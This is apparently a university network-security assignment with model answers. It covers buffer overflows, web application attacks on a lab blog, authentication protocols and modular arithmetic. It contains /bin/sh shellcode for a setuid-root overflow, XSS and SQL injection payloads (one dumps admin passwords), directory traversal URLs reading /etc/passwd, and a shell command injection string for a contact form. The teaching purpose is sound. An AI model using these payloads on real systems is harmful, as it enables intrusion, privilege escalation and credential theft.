Assignment 4: Local & Application Exploits

In this assignment, we explore remote-to-local and privilege escalation exploits used to gain or elevate attacker access to systems. Throughout this assignment we will see these exploits used at both the operating system and the application level, and learn how they happen and how we can prevent them (both as developers and as system administrators).

1. Buffer Overflows (75 pts)

In this section, you will learn about buffer overflows on the stack, a common vulnerability that allows an attacker to run arbitrary code. This lab will require some programming in C, some knowledge of assembly, and a touch of debugging tools.

Background

Stack-based buffer overflows have been around for a long time, and all indications are that they will continue to be a problem in the near future. Aleph One wrote the definitive paper on using this technique to exploit programs, Smashing The Stack For Fun And Profit. You should read this paper carefully. It will walk you through every aspect of overflowing the buffer, creating shellcode, and ultimately exploiting a vulnerable program. It is very long and full of technical detail, so make sure to set aside plenty of time to work through it. Also keep in mind that your Linux version and gcc compiler may differ from those used for the paper, so the numeric values in its examples (pointer values, number of bytes, etc.) could be different on your system.

Exploiting

Several strategies have been created to counter these types of bugs in programs. The version of Linux installed on your machine employs two different stack protection mechanisms. One randomizes stack addresses to make it difficult to predict the location of shellcode. The other places random canary values on the stack to protect stored addresses. You need to disable both of these mechanisms, or else it will be difficult to exploit overflows on your system.
To disable stack protection, run the script /root/bin/disable-stack-protection (as root or through sudo). To re-enable stack protection, run /root/bin/enable-stack-protection. Note that if your system is ever rebooted, the stack protections will be re-enabled by default. To avoid placing canary values in your executables, you need to use gcc-3.4, which is already installed.

a. Download the zip file from strawman and examine the code in uppercase.c and lowercase.c. These programs are simple UNIX utilities that accept a string containing both upper and lower case characters from the command line and return that string converted entirely to upper case or lower case characters. Do these programs have any internal buffers? Do they do any input length checking? Describe what seems, at first glance, to be unsafe. Provide comments on a line-by-line basis. (5 pts)

The local variable buf is the internal buffer (512 bytes in length). The for loop uses strlen() to bound its iteration, but the input length is never validated against the size of the internal buffer. The strcpy() call, issued without any check on the length of the input, can overflow the buffer (a bounded copy such as strncpy() should be used instead). The setuid() operation is also not recommended unless absolutely necessary.

b. Now focus on uppercase.c. Run make to compile the program. Make sure you DO NOT compile the programs directly with gcc, as that will use gcc version 4, which inserts canary values. Run uppercase, and find a string input that will cause it to segmentation fault. Why does this happen? (5 pts)

A string longer than about 524 bytes should cause the segmentation fault. This happens because the overflowing buffer overwrites the saved return address, so an illegal address is loaded into the instruction pointer (EIP) when the function returns.

c. Use gdb to run the program again with the same, very long, first argument (Hint: set args AAAAAAA...). What is the %eip address reported when it causes a segmentation fault?
Compare this value to your string's ASCII hexadecimal representation (Hint: man ascii). Determine the length of the shortest string needed to control %eip. (5 pts)

The shortest string length recorded in my test was 529 bytes. The %eip address should be the last 4 bytes of the shortest string that caused the segmentation fault.

d. Draw a diagram of the stack for uppercase which includes the stack frames for main() and strcpy() and all local variables for main(). Also, include the location of main()'s return address and how it gets overwritten by an overflown buf. Finally, include the arguments passed to the main() program in the diagram as well, relative to the stack frames. Exact offsets aren't that important here, but relative locations are (Hint: use the print command to find the location of local variables, arguments, etc., e.g.: print &buf). (10 pts)

    Address       Contents
    0x00000000    Unused memory
                  strcpy()'s stack frame
                  main()'s stack frame:
                      i
                      buf[512]
                      Return pointer
                      argc
                      argv**
    0xbffffffa    argc, argv[], environment, etc.

Addresses grow downward in this diagram, so a copy that runs past the end of buf writes toward the return pointer and overwrites it. If the diagram is drawn upside-down, it is also fine as long as everything is correct in relative terms.

e. Write a new program in C which exploits this stack-based buffer overflow to execute a shell. Your exploit should embed shellcode in the argv[1] buffer of uppercase and then overwrite the stack frame return address so that execution continues within that buffer when main() returns. The shellcode you need to use is:

    char scode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/sh";

The exploit program you will be writing should look like the following:

    int main(void)
    {
        /* variable declaration here */
        /* preparation for exploiting here */
        /* then call execl() to invoke the uppercase program,
           where arg is a string (i.e. char[], or char*) */
        execl("./uppercase", "./uppercase", arg, NULL);
        return 1; /* reached only if execl() fails */
    }

As mentioned, remember to disable the stack protection and the canary values; otherwise, it will be much harder to exploit. Once you have a working exploit which executes a shell, make uppercase a setuid root program by running chmod u+s uppercase as root. Now, run your exploit again as a non-root user. Once your shellcode runs, use the id(1) command to determine what user the shell is executed as. If everything works correctly, you'll have elevated privileges to root through this overflow. Please submit source code for your exploit that has comments on every line demonstrating that you understand how this works. Points will be deducted for less than thorough explanations. (30 pts)

Before running the exploit, remember to disable the stack protection, and use gcc-3.4 for compilation.

Sample solutions: sample-exploit.c, another-sample-exploit.c

f. How would you modify the lowercase program to make it safe from buffer overflow attacks? (10 pts)

The most basic fix is to replace strcpy() with its "safe" cousin strncpy(), bounding the copy by the size of the destination rather than the length of the input, for example strncpy(buf, argv[1], sizeof(buf) - 1), and then terminating the buffer explicitly with buf[sizeof(buf) - 1] = '\0'. An explicit strlen() check against the buffer size before copying is also a possible option.

g. If buf were instead allocated via malloc() in these vulnerable programs, would the same techniques for exploitation work? Why or why not? (5 pts)

malloc() allocates memory on the heap instead of the stack. Overflowing the heap for the purposes of an exploit is possible, but the techniques are quite different and often require more effort, since helpful structures like return addresses and saved frame pointers don't generally live in the heap.

h. What is different about executing a setuid program versus a non-setuid program? What are the dangers of setuid programs? Why are setuid programs sometimes necessary? (5 pts)

setuid programs execute as the user who owns the binary, rather than the user who is executing it.
If a vulnerability exists in the setuid binary, then a local user could exploit it to take over the account that owns it. setuid programs are often necessary, as many everyday tasks require privileged access to system calls where alternative privilege models are not available.

2. Application Exploits (100 + 20 pts)

In this section, you will explore common vulnerabilities in applications. Your experiments on a web-based application will try to exploit vulnerabilities that are commonly found in these types of programs.

a) Cross-site Scripting (20 pts)

Cross-site scripting vulnerabilities are common in web applications. These flaws allow an attacker to subvert the interaction between users and a website. Read more about the different forms of XSS and how they are typically exploited.

The application you will test is at the URL http://strawman/blog/. You should access this web site from either your Windows machine or over an SSH tunnel. Locate the login page for this application, and fuzz the form fields with HTML special characters to locate a cross-site scripting bug.

a. Now, develop a proof-of-concept (PoC) exploit for this bug which embeds an image tag (e.g. <img src="..." />) into the page (use any image URL you want). Your injected HTML characters must present a final page to the browser which is HTML compliant. Once you have developed a working PoC exploit, take a screenshot of the page in your browser. In addition, save the HTML source of the resulting, exploited page. Submit both of these in your report.

    Username: Tester"/></td></tr><tr><td><img src="url_to_an_image_file"><div class="foo
    Password: "/></td></tr><tr><td><img src="another_image_file" "><div class="bar

The HTML code of the page after injection must remain HTML compliant (e.g. opening tags must have closing tags).

b. Find an additional XSS vulnerability on a page other than the login page. This second vulnerability should be accessible without having to log in.
Write a short PoC exploit for this second bug and record just the string you inject. You do not need to save a screenshot or the full HTML source. Include in your report the string you used for your second XSS exploit along with the name of the page and the name of the form element you attacked.

The last link at the bottom of the page, which allows users to choose the "Printable friendly" view, contains an additional XSS vulnerability. The injection goes into the URL:

    http://strawman/blog/index.php?style=injected_html_code

This security hole is also dangerous because, by injecting a file name into the URL, the source code of the PHP pages can be read by viewing the source of the returned page, for example:

    http://strawman/blog/index.php?style=index.php

Note: any vulnerability in other pages (except the login page) is also acceptable.

b) SQL Injection (30 + 20 pts)

WARNING: In this section you will be manipulating the backend database of this application. There is a small chance that your attacks will break or disable the web application. Please think carefully about the attacks before you perform them, as other students need to use the same system. If you do break something, report it to the lab TA immediately so it can be fixed.

SQL injection vulnerabilities are very serious flaws which open applications up to a whole host of database attacks. These vulnerabilities affect more than just web-based applications and often allow the circumvention of authentication and access controls for information stored in a database. SQL injection flaws can also be the stepping stone used by attackers to fully compromise a database server. Read more about SQL injection through the provided references. You may also want to search the web for more information on the topic.

a. Return to the login page of the weblog application. At least one SQL injection vulnerability exists in this form. Develop an exploit for this form which allows one to log in to the application without knowing a valid username or password.
Hints: Imagine the SQL query a programmer might write to check a user's credentials. The backend database is MySQL. Also, the string -- is the SQL comment marker and behaves much the same as // does in C++. Record the resulting injection string you used to log in. (10 pts)

Students must provide the injected SQL code that allows them to log in successfully as a valid user. Example:

    Username: ' or 1=1--
    Password: ' or 1=1--

b. Locate another SQL injection vulnerability in some other page of the application. Develop a simple PoC exploit which demonstrates how you can manipulate the results of the query. (10 pts)

An example: the viewentry.php page lists the entry with a specified message id. We can change this behavior to list all entries of the weblog without navigating to the index.php page. The following code is injected into the msgid parameter of the viewentry.php page:

    msgid=1' or '1'='1

Note: any SQL code that changes the displayed result of a page (compared to the "official/expected" result) is considered a successful exploit.

c. Bonus question: Write an SQL injection exploit which steals a username and password from this application's database. (20 pts)

Students must show the method/code they used to obtain the correct username and password. The SQL code below can be used to retrieve the usernames and passwords:

    msgid=' union select 1, username, password, "" from adminuser where password <> '

The username and password of the admin user can also be discovered by running shell commands through the injection in sendmail.php (see the Shell Command Injection section).

d. Suppose a programmer needs to run an SQL query such as:

    SELECT * FROM mytable WHERE a='foo' AND b='bar'

In his application, users can completely control the data in the strings foo and bar. To protect his application against SQL injection, the programmer decides to insert a backslash \ in front of all single quote characters provided by users in these strings.
This is an acceptable form of escaping/encoding in his database system. For example, if a user provided the string "Let's drive to the beach!", it would be encoded in the SQL query as "Let\'s drive to the beach!". Therefore, inserting single quote characters would not allow attackers to break out of the explicit single quotes in the query. Describe why this protection alone would not prevent an SQL injection attack for this particular query, and give a sample set of strings which demonstrate the problem. (Hint: Recall that the attacker can control both strings in this query.) (10 pts)

The filter escapes single quotes but not backslashes, so the attacker can supply \' for each single quote he wants to inject. The filter turns the attacker's \' into \\'. The database reads \\ as an escaped literal backslash, which leaves the following quote unescaped, and that quote closes the string. For example:

The original query:

    SELECT * FROM mytable WHERE a='foo' AND b='bar'

The code injected into the parameter a:

    \' or 1=1--

The resulting query, which will list all rows in the table:

    SELECT * FROM mytable WHERE a='\\' or 1=1--' AND b='bar'

c) Directory Traversal (25 pts)

Directory traversal attacks are another, somewhat less common, class of application vulnerability. They typically occur because programmers trust some portion of a filename or file system path provided by users, without validation or sanitization. These flaws often result in unauthorized file retrieval and sometimes even facilitate remote execution attacks. Read more about directory traversal attacks and how they are typically exploited.

a. Explore the weblog application and search for a user-supplied parameter that might allow a directory traversal attack. Once you locate one, use it to download the system's /etc/passwd file. Submit the /etc/passwd file. (10 pts)

Exploit the "Printable friendly" format feature mentioned in the XSS attack above:

    http://strawman/blog/?style=../../../../../etc/passwd

b. Pull down other files until you find positive evidence of what OS and version is hosting the website. Save these files for your report. (10 pts)
The same technique as above works here:

    http://strawman/blog/?style=../../../../../proc/version

c. Suppose a programmer accepts a filename through a URL request parameter, in a script named safefromtraversal.php. In this script, the programmer removes all occurrences of the string '../' from the filename provided by clients. (In other words, the request parameter is searched for any occurrences of this string. Any found are replaced with the zero-length string, and later the parameter is used as a filename.) With this protection alone, would the script be secure against directory traversal attacks? If not, describe an attack to bypass this protection. (5 pts)

No. String replacement functions in many programming languages make a single pass and do not rescan their own output, so the attacker can send ....// for each ../ he wants to inject. Removing the inner ../ from ....// leaves ../ behind.

d) Shell Command Injection (25 pts)

WARNING: In this section you will be running commands on the server hosting this application. There is a small chance that your attacks will break or disable the web server or application. Please think carefully about the attacks before you perform them, as other students need to use the same system. If you do break something, report it to the lab TA immediately so it can be fixed.

Shell command injection, while somewhat rare, can be devastating to an application's security because these kinds of flaws generally allow remote execution of code and are usually easy to exploit. The problem usually lies in an application's use of external commands to accomplish certain tasks. Often, for convenience, programmers will run external commands via the system shell or some equivalent interface. However, if user input is included in such commands (for instance, as command line parameters), then it is very difficult to prevent shell meta-character injection. Read more about these attacks and how they can be prevented (accessible only through your Windows VM).

a. Review the pages available in the weblog application and think about which pages are most likely to use an external command. Now, find and exploit one command injection vulnerability. To prove you can run commands on the server, write a file to /tmp named team-T.hack (where T is your team number) which contains the email addresses of all of your team members. This file may contain other garbage as well, but it should have your team members' email addresses somewhere in it. To test whether you were successful, you can read the file back in again with the directory traversal vulnerability you found earlier. Hint: You may use the directory traversal vulnerability to swipe the source code for many PHP scripts. Reviewing the sources will allow you to find such a hole very quickly. You need to describe the method and the command, URL, etc. you used to perform the attack in your report. (15 pts)

Students should obtain the source code of the sendmail.php page, then notice that sendmail.php doesn't check its input before running shell_exec(). The following exploit allows us to run an arbitrary shell command via the "Contact the Webmaster" page:

    Subject: any text you want here
    Body: '; <arbitrary shell command> | /usr/sbin/sendmail -f webmaster@strawman.nslab teamXX@teamXX-router.nslab ; /bin/echo '

The output of the executed shell command can be read by running the mail program on the Linux machine (in the code above, teamXX@teamXX-router.nslab is the receiving email address).

b. Consider the functions execl and system from the standard C library. Explain why using execl is safer than system. Why would a programmer be tempted to use system? (5 pts)

The system() function takes a single argument, the command line string, which includes the command name and its arguments, and calls the shell to execute this command line. Thus, an attacker who controls one or more of the arguments can break the current command into multiple arbitrary commands.
The execl() function is safer because it takes the command name as its first argument and the command's arguments as separate, subsequent arguments, and then runs the command directly without using a shell. Therefore, shell meta-characters in an argument are passed to the command as literal text, and the attacker can inject neither a different command name nor additional commands. The programmer, however, is still tempted to use system() because of its ease. Moreover, calling execl() replaces the current process image with the new program that runs the specified command. Hence, in order to keep the original process running, the programmer has to fork() before calling execl(). This is perhaps the biggest disadvantage of using execl().

c. Consider the following snippet of C code:

    snprintf(cmd, 1024, "whois %s >> /tmp/whois.log", ip);
    system(cmd);

Suppose an attacker could completely control the content of the variable ip, and that this variable isn't checked for special characters. Name three different meta-characters or operators which could allow an attacker to "break out" of ip's current position in the string to run an arbitrary command. (5 pts)

Three shell meta-characters are preferred by attackers:

";": this allows the attacker to run a new command after the command specified by the programmer.

"|": this allows the attacker to redirect the output of a command to the input of another command that is under the attacker's control.

">" or ">>": this allows the attacker to write or append the output of a command to a file that can be read by the attacker.

3. Impersonation, authentication and session keys (15 pts)

a) Explain why it is a bad idea for the initiator in a mutual authentication protocol to send out the first challenge. [3]

It is a bad idea for the initiator in a mutual authentication protocol to send out the first challenge because, in that case, the following attacks are possible.
Man-in-the-middle attack

If the initiator is allowed to send out the first challenge, then an intruder I can initiate the communication and carry out a man-in-the-middle attack to impersonate a valid user, as shown:

    1. I -> B: I'm A, C1
    2. B -> I: I'm B, E(C1), C2
    3. I -> A: I'm B, C2
    4. A -> I: I'm A, E(C2), C3
    5. I -> B: E(C2)

Here, I communicates with B as if it were A, using A as a decryptor.

Connection attack

An intruder can initiate the communication and carry out a connection attack to impersonate a valid user, as shown below:

    1. I -> B (connection 1): I'm A, C1
    2. B -> I (connection 1): I'm B, E(C1), C2
    3. I -> B (connection 2): I'm C, C2
    4. B -> I (connection 2): I'm B, E(C2), C3
    5. I -> B (connection 1): E(C2)

Here, I communicates with B as if it were A, using B itself as a decryptor through multiple connections.

b) Consider a network such as the Internet where Trudy can inject spoofed packets in an attempt to hijack a conversation between Alice and Bob. Trudy can send packets with Alice's address as the source address to Bob, but the network will not deliver packets with Alice's address as the destination address to Trudy. What are some problems Trudy faces in attempting to transmit a file to Bob by pretending to be Alice? [3]

Trudy will face the following problems:

1. When Trudy sends a file to Bob as a stream of packets over TCP, it is difficult even to set up the TCP connection with the three-way handshake, as Bob sends the SYN-ACK to Alice and not to Trudy.

2. If Trudy tries to hijack an existing connection between Alice and Bob and send the file over it, Bob will send the acknowledgement for each packet to Alice. There is no way for Trudy to find out whether Bob received exactly the file that Trudy sent.

3. Trudy cannot use the flow control mechanism because she never sees an ACK from Bob, and hence does not know the rate at which she should transmit data in order to avoid packet loss at Bob's end.

4. If the communication between Trudy and Bob is over FTP, Trudy will have a problem setting up the FTP connection.
In an FTP connection, Trudy has to set up a data connection on the port that Bob sends over the control connection. Since Trudy does not receive the information Bob sends on the control connection, she cannot set up an FTP data connection with Bob to send a file.

5. Even if Trudy tries to hijack an existing FTP session between Alice and Bob, she will not learn of a connection reset or packet loss, due to the TCP problems mentioned above.

c) Let Alice and Bob share the secret key K. Let R be a random string that is exchanged in the clear during the authentication phase. Why are the following bad choices as session keys: E_K(K), E_{R+K}(K) and R ⊕ K? [5]

E_K(K): If we use E_K(K), we would have the same session key for all sessions, which does not add much security over not having a session key at all.

E_{R+K}(K): Suppose we use E_{R+K}(K) as a session key. Since R is transmitted in the clear, the attacker can easily get hold of R. In that case, the difficulty of guessing the session key reduces to guessing the shared secret K. This is similar to the previous case. Also, in some cases, we may want to establish a session using the shared secret K and give relatively untrusted software the session key, as mentioned in the 4th point of answer d. In this case, if we use E_{R+K}(K) as a session key, we need to give out the shared key as well to the untrusted software.

R ⊕ K: R ⊕ K is not a good choice for a session key because, if the attacker gets the session key S, he can recover the shared secret K as well by computing S ⊕ R, since R is sent in the clear.

d) What are some reasons for having a session key in the first place? Why not simply use the shared secret for encrypting the session? [4]

The reasons for having a session key different from the shared secret are:

1. Keys wear out if used a lot. If we use the shared secret K as the session key, the intruder gets access to a larger amount of data encrypted with the key K. This increases the chances of an attacker successfully finding the key K.

2. The shared secret K generally has a longer validity time than a single session. If we use K as a session key, then an attacker might be able to replay messages from an old conversation.

3. If a long-term shared secret key is compromised, it is desirable to prevent old recorded messages from being decryptable. If every conversation is encrypted with the same key K, then this would be difficult to achieve.

4. We may want to establish a session and give relatively untrusted software the session key, which is good only for that conversation, rather than giving away the long-term shared secret.

4. Secret-key Authentication (15 pts)

    Alice -> KDC:   N1, Alice wants Bob
    KDC   -> Alice: K_A(N1, K_AB, Bob, ticket); ticket = K_B(K_AB, Alice)
    Alice -> Bob:   ticket, K_AB(N2)
    Bob   -> Alice: K_AB(N2-1, N3)
    Alice -> Bob:   K_AB(N3-1)

a) Explain how, in the absence of N1, Trudy can impersonate Bob using an old key of Bob's and an old reply from the KDC. [5]

Suppose that N1 is not used at all. Trudy gets hold of an old key of Bob, K_B_old, as well as an old reply from the KDC, R_old. When Alice requests a conversation with Bob, Trudy first impersonates the KDC and replays the old message R_old, which looks like an ordinary reply from the KDC. Trudy then impersonates Bob to Alice, because she knows the key K_B_old and hence can decrypt the ticket to extract K_AB.

    Alice -> KDC (intercepted by Trudy): Alice wants Bob
    Trudy -> Alice: R_old = K_A(K_AB, Bob, Ticket_old); Ticket_old = K_B_old(K_AB, Alice)
    Alice -> Trudy: Ticket_old, K_AB(N2)
    Trudy -> Alice: K_AB(N2-1, N3)
    Alice -> Trudy: K_AB(N3-1)

b) Why does the reply from the KDC to Alice contain "Bob"? [3]

Suppose there is no "Bob" in the reply from the KDC to Alice. Then Trudy can change the initial request from Alice to the KDC into {N1, "Alice", "Trudy"}. Complying with the request it receives, the KDC sends a ticket encrypted with Trudy's key, K_T, instead of Bob's key, K_B. Alice then uses this ticket to set up the conversation. Since Trudy can decrypt the ticket, she can impersonate Bob.
    Alice -> KDC (intercepted by Trudy): N1, Alice, Bob
    Trudy -> KDC:   N1, Alice, Trudy
    KDC   -> Alice: K_A(K_AT, ticket); ticket = K_T(K_AT, Alice)
    Alice -> Trudy: ticket, K_AT(N2)
    Trudy -> Alice: K_AT(N2-1, N3)
    Alice -> Trudy: K_AT(N3-1)

c) Explain how Trudy can impersonate Alice using an old key of Alice's and an old reply from the KDC. [5]

Suppose that Trudy gets hold of an old key of Alice, K_A_old, and an old reply from the KDC, R_old. R_old is encrypted using K_A_old, and hence Trudy can decrypt it. Trudy skips the first two steps of the protocol. She extracts Ticket_old and K_AB from R_old and sends the ticket to Bob to initiate the conversation. Assuming that Bob's secret key K_B has not changed, Bob finds Ticket_old to be a perfectly valid request coming from Alice and proceeds with the normal conversation setup. Thus, Trudy can impersonate Alice.

    Trudy -> Bob:   Ticket_old, K_AB(N2)
    Bob   -> Trudy: K_AB(N2-1, N3)
    Trudy -> Bob:   K_AB(N3-1)

d) What is the name of the authentication protocol that underlies Kerberos? [2]

The protocol underlying Kerberos is the Needham-Schroeder protocol.

5. Modular arithmetic (15 pts)

a) Which of the numbers 1, 2, ..., 20 are coprime to 21? What is φ(21)? [5]

The numbers between 1 and 20 that are coprime to 21 are: 1, 2, 4, 5, 8, 10, 11, 13, 16, 17, 19, 20. Therefore φ(21) = 12.

b) What is 3^2008 mod 11? [4]

Since 11 is prime and does not divide 3, Fermat's little theorem gives 3^10 mod 11 = 1, so the exponent can be reduced modulo 10:

    3^2008 mod 11 = 3^(2008 mod 10) mod 11 = 3^8 mod 11 = 6561 mod 11 = 5

c) Name the two mathematical problems at the heart of most public key systems. [2]

The two mathematical problems at the heart of most public key systems are integer factorization and the discrete logarithm.

d) What is repeated squaring and what is it used to compute? [4]

"Repeated squaring" is an algorithm used for the fast computation of large integer powers of a number. For any even power n, x^n is expressed as x^(n/2) * x^(n/2), while an odd power n is first expressed in terms of the nearest even power, x^n = x * x^(n-1), and then reduced further by repeating this. This reduces the work required to calculate x^n to about log2(n) squarings (at most roughly 2*log2(n) multiplications in total), compared with the naive algorithm, which requires n-1 multiplications.

Note: Diagram from Wikipedia.